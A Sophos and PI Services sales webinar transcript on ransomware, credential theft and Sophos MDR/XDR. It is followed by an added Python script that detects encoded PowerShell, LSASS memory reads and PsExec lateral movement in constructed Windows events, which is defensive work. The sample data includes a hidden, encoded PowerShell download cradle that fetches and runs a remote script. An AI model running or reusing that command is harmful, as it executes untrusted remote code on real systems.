Sophos Cybersecurity: Opt for Peace of Mind in Cybersecurity
Welcome everyone to this webinar, “Opt for Peace of Mind in Cybersecurity.” I’m Frédéric REVEL from PI Services, working as a Business Engineer, and I’m joined by Gilles SARQUIZ, Pre-Sales Engineer at Sophos. I’ll begin with a brief introduction to PI Services to give you a bit of context.
PI Services has been operating for over 25 years as architects and managers of Microsoft-based infrastructures. We work across all types of environments—on-premises, cloud, or hybrid—from endpoints to servers, including collaborative tools, identity, and of course, security, which is today’s focus with this webinar.
We offer a comprehensive and cross-functional vision, enabling us to support you from the early stages of your project through to deployment and ongoing managed support services. This includes helping you choose the right solutions, designing the architecture, and conducting assessments and scoping studies.
We also assist your teams with implementation and integration of solutions and infrastructures, ensuring a full handover through skills transfer and technical documentation. Finally, we offer support services for your infrastructure via several contract options, which I’ll now outline.
Focusing on our Managed Services, we offer three tailor-made service types:
Full or partial outsourcing of your IT infrastructure under operational maintenance contracts,
Support contracts for level 2 and level 3 incident resolution and advisory,
On-demand services for specific or one-off requirements.
These three pillars can be combined within a single contract to cover infrastructure, endpoints, networks, and security—especially with Sophos solutions—allowing us to support you in both attack prevention and incident resolution. And on that note, I’ll now hand over to Gilles.
Thank you, Frédéric. Good morning everyone. I’m Gilles SARQUIZ, Pre-Sales Engineer at Sophos.
Today, as Frédéric mentioned, we’ll explore Sophos’ offering in partnership with PI Services, who are certified Sophos partners. We’ll first look at the evolution of cyberattacks, based on our 2023 Threat Report, before diving into our solutions.
Just briefly, Sophos is the leading European-born cybersecurity vendor for businesses. Founded in 1985 in Oxford, England, we now operate globally with over 4,000 employees. In France, we have around 50 staff, including 12 technical support engineers who speak French and are available during standard French business hours. Additionally, we offer 24/7 global support.
Our go-to-market model is indirect: Sophos sells to distributors, who in turn supply trained and certified partners like PI Services.
Our presence is backed by a global network of Sophos Labs—threat intelligence centres monitoring emerging threats and distributing updates—as well as research and development teams worldwide. Sophos has grown through acquisitions, evolving from traditional antivirus to a full ecosystem of protection for networks, endpoints, mobiles, and beyond.
Threat Landscape Overview
The 2023 Threat Report, based on Sophos Labs’ global telemetry and client data, is publicly available. Key observations include:
Geopolitical events shaping attack strategies,
Rising ransomware sophistication,
Cybercrime industrialisation,
Credential theft as a key tactic,
Widespread use of legitimate tools by attackers (e.g., pentesting utilities),
Malware now targeting mobile and IoT devices—not just PCs.
On average, Sophos detects over 650,000 new malware samples per day, many of which are unique or targeted variants. This makes signature-based detection outdated, which is why Sophos has relied on AI and behavioural analysis since 2016.
Over 75% of malware seen is detected only once, which implies targeted attacks. Nearly 50% of breaches exploit known or unknown vulnerabilities, highlighting the importance of patch management and secure configurations. Detection of these vulnerabilities takes on average 280 days, leaving organisations exposed for long periods.
Attack Methodology
Many threats are now perpetrated by active attackers—humans operating malware remotely to adapt and bypass defences. These targeted operations involve several stages:
Reconnaissance – Researching the target, identifying weak points.
Weaponisation – Creating tailored malicious payloads.
Delivery – Via phishing, malicious websites, USB drives, etc.
Exploitation – Running malware to exploit a vulnerability.
Installation – Establishing persistence on the system.
Command & Control (C2) – Maintaining external communication for further instructions.
Action on Objectives – Whether data theft, encryption, or disruption.
Defences can counter most phases post-delivery. Key mitigations include user training, email/web filtering, endpoint protection, behavioural detection, and log analysis for anomalies—this is where advanced detection and response come in.
Common Attacker Tactics
Topical Lures – Phishing emails often exploit current events (e.g., COVID-19 or war in Ukraine) to trick users into clicking malicious links.
Cybercrime-as-a-Service – Attackers now rent phishing kits, buy access credentials, or use ready-made ransomware platforms with management dashboards, making attacks more accessible to non-technical criminals.
Ransomware Trends – The most common strains evolve yearly (e.g., LockBit in 2022). Attackers adapt rapidly, and their tools now resemble professional IT software in complexity.
Pentest Tools Misused – Legitimate tools like Mimikatz, Metasploit, or PowerSploit are frequently used by attackers for credential dumping and privilege escalation.
Living Off the Land – Attackers use built-in OS tools (e.g., PowerShell) to stay under the radar. It’s vital to monitor or restrict these tools where possible.
Security Recommendations
Assume compromise and plan accordingly.
Backups must be isolated and regularly tested.
Layered protection across endpoints, servers, and network.
Don’t pay ransoms—you may not recover data and only incentivise more attacks.
Use human expertise alongside tools—alerts alone are not enough.
Create and rehearse an incident response plan. You need clear procedures during an attack to avoid panic and mistakes.
From Passive to Proactive Security
Traditional antivirus is reactive and binary—it blocks known threats and misses unknown ones. Sophos advocates for EDR (Endpoint Detection and Response) and XDR (Extended Detection and Response), to:
Investigate suspicious activity,
Hunt for hidden threats,
Respond proactively to incidents.
XDR expands beyond endpoints to include telemetry from:
Firewalls,
Email gateways,
Cloud services,
Mobile devices,
Third-party tools (via connectors).
These data are centralised and correlated in Sophos’ Data Lake, enriched by AI and threat intel, enabling advanced threat detection and response.
Sophos MDR: Managed Detection & Response
Sophos MDR is our fully managed, 24/7 cybersecurity-as-a-service, combining:
Expert threat hunters,
AI-powered tools,
Defined incident response playbooks.
Since 2019, Sophos MDR has:
15,000+ customers in 121 countries,
6 global SOCs (2 in Europe),
500+ specialists dedicated to MDR.
Gartner and G2 both rank us as leaders in MDR and cybersecurity.
MDR offers different service levels:
Threat Advisor – Monitoring and alerting only.
Sophos MDR – Monitoring + incident containment.
Sophos MDR Complete – Adds full remediation, root cause analysis, and a $1M breach warranty.
Example Incidents
Spear Phishing
Email lure leads to malware execution.
MDR isolates the device, removes malware, and reports actions.
MDR Complete also tracks the original email, checks for spread, and advises on identity reset.
Ransomware via VPN
Stolen credentials used to spread ransomware via PsExec.
MDR blocks the process, isolates servers, disables accounts.
MDR Complete investigates source IPs, scans for persistence, and suggests resetting domain-wide credentials and enabling MFA.
Sophos XDR Integrations
Beyond Sophos’ native products, we can ingest security data from:
Microsoft 365 & Defender via Graph Security API,
Other vendors like Palo Alto, Fortinet, Okta, etc.,
Custom logs or generic security tools.
We also offer:
Network Detection Appliances (virtual sensors on port mirroring),
Log retention for up to 1 year for long-term investigations.
Conclusion
Sophos MDR delivers:
Proven technology (Intercept X, Firewall, etc.),
Unified management via the Sophos Central platform,
Industry-leading detection and response times (under 40 minutes),
Seamless integration across environments—even with third-party tools.
If you’d like to learn more or see a demonstration tailored to your infrastructure, feel free to contact PI Services or Sophos.
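Appended after the transcript as an added example (it is not code from the webinar, from Sophos or from PI Services): the script below shows the kind of detection logic the "Living Off the Land", "Pentest Tools Misused" and "Ransomware via VPN" passages above call for. It scans constructed Windows Security, System and Sysmon-style events for encoded or hidden PowerShell, non-allowlisted reads of LSASS memory, and PsExec-style service installs, then correlates credential theft on one host with a service install on another host under the same account, which is the "stolen credentials spread ransomware via PsExec" pattern Gilles describes. The event field names, the LSASS allowlist, the sample events and the 60-minute window are this example's own assumptions, not a Sophos schema or rule set.

```python
"""Toy detections for PowerShell abuse, LSASS credential dumping and PsExec-style
lateral movement over constructed Windows/Sysmon-style events (stdlib only)."""
import base64
import re
from datetime import datetime, timedelta

# -EncodedCommand takes base64 of UTF-16LE text; -w hidden suppresses the console.
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_FLAGS = re.compile(r"-(?:w|windowstyle)\s+hidden", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"Invoke-Expression|\bIEX\b|DownloadString|DownloadFile|Invoke-WebRequest|FromBase64String", re.I)
POWERSHELL_EXE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?\b", re.I)
# Processes allowed to read LSASS memory: an assumption for this example, tune per estate.
LSASS_ALLOWLIST = {"csrss.exe", "wininit.exe", "msmpeng.exe"}
PROCESS_VM_READ = 0x0010  # access right a credential dumper needs on lsass.exe


def ps_encode(script):
    """Build the argument PowerShell expects after -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):  # truncated or non-base64 argument
        return None


def _alert(ev, technique, summary, evidence):
    return {"ts": ev["ts"], "host": ev["host"], "user": ev.get("user", ""),
            "technique": technique, "summary": summary, "evidence": evidence}


def detect(ev):
    """Apply every rule to one event; return a list of alerts (possibly empty)."""
    alerts, eid, chan, cmd = [], ev.get("event_id"), ev.get("channel"), ev.get("cmdline", "")
    # Rule 1: living off the land with PowerShell (Security 4688 / Sysmon 1 process creation)
    if eid in (4688, 1) and POWERSHELL_EXE.search(cmd):
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            alerts.append(_alert(ev, "T1059.001", "encoded PowerShell command", decoded))
        if HIDDEN_FLAGS.search(cmd):
            alerts.append(_alert(ev, "T1059.001", "hidden PowerShell window", cmd))
        if DOWNLOAD_CRADLE.search(decoded if decoded is not None else cmd):
            alerts.append(_alert(ev, "T1059.001", "PowerShell download cradle", decoded or cmd))
    # Rule 2: credential dumping, a non-allowlisted process reads LSASS memory (Sysmon 10)
    if eid == 10 and chan == "Sysmon" and ev.get("target_image", "").lower().endswith("\\lsass.exe"):
        source = ev.get("source_image", "").rsplit("\\", 1)[-1].lower()
        granted = int(ev.get("granted_access", "0x0"), 16)
        if granted & PROCESS_VM_READ and source not in LSASS_ALLOWLIST:
            alerts.append(_alert(ev, "T1003.001", "LSASS memory read by " + source, ev["granted_access"]))
    # Rule 3: PsExec-style service execution (System 7045 service install)
    if eid == 7045 and chan == "System":
        svc, path = ev.get("service_name", ""), ev.get("image_path", "")
        if "psexesvc" in (svc + path).lower() or "\\admin$\\" in path.lower():
            alerts.append(_alert(ev, "T1569.002", "PsExec-style service installed", path))
    return alerts


def correlate(alerts, window=timedelta(minutes=60)):
    """Escalate a credential-dump alert followed, within the window and under the same
    account, by a PsExec-style install on a different host (lateral movement)."""
    cred = [a for a in alerts if a["technique"] == "T1003.001"]
    moves = [a for a in alerts if a["technique"] == "T1569.002"]
    out = []
    for c in cred:
        t0 = datetime.fromisoformat(c["ts"])
        for m in moves:
            delta = datetime.fromisoformat(m["ts"]) - t0
            if m["host"] != c["host"] and m["user"] == c["user"] and timedelta(0) <= delta <= window:
                out.append({"summary": "lateral movement after credential theft", "from": c["host"],
                            "to": m["host"], "user": c["user"], "minutes": int(delta.total_seconds() // 60)})
    return out


def run(events):
    alerts = [a for ev in events for a in detect(ev)]
    return alerts, correlate(alerts)


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [  # constructed sample telemetry; the field names are this example's own schema
    {"ts": "2023-03-01T09:00:05", "host": "WS-017", "channel": "Security", "event_id": 4688,
     "user": "ACME\\jdoe", "cmdline": "powershell.exe -nop -w hidden -enc " + ps_encode(CRADLE)},
    {"ts": "2023-03-01T09:03:40", "host": "WS-017", "channel": "Sysmon", "event_id": 10, "user": "ACME\\jdoe",
     "source_image": "C:\\Users\\jdoe\\AppData\\Local\\Temp\\svc.exe",
     "target_image": "C:\\Windows\\system32\\lsass.exe", "granted_access": "0x1010"},
    {"ts": "2023-03-01T09:05:12", "host": "WS-017", "channel": "Sysmon", "event_id": 10,
     "user": "NT AUTHORITY\\SYSTEM", "source_image": "C:\\ProgramData\\Microsoft\\Windows Defender\\MsMpEng.exe",
     "target_image": "C:\\Windows\\system32\\lsass.exe", "granted_access": "0x1010"},  # allowlisted AV
    {"ts": "2023-03-01T09:31:00", "host": "FS-02", "channel": "System", "event_id": 7045,
     "user": "ACME\\jdoe", "service_name": "PSEXESVC", "image_path": "%SystemRoot%\\PSEXESVC.exe"},
    {"ts": "2023-03-01T10:15:00", "host": "WS-022", "channel": "Security", "event_id": 4688,
     "user": "ACME\\backup", "cmdline": "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"},  # benign
]

if __name__ == "__main__":
    found, escalations = run(SAMPLE_EVENTS)
    for a in found:
        print(a["ts"], a["host"], a["technique"], a["summary"])
    for e in escalations:
        print("ESCALATE:", e)
```

The benign scheduled script produces no alert and the allowlisted AV engine's LSASS access is ignored, while the workstation's hidden, encoded download cradle, the unknown binary reading LSASS and the later PSEXESVC install on the file server each fire and are tied together into one escalation. Two caveats a practitioner would add: attackers routinely rename PsExec, so the service-name match is the weakest part of rule 3 and any 7045 event with an unfamiliar image path under the admin share deserves review, and rule 1 is only as good as the command-line logging it depends on, so enable command-line auditing for 4688 (or deploy Sysmon) and PowerShell script block logging before relying on it.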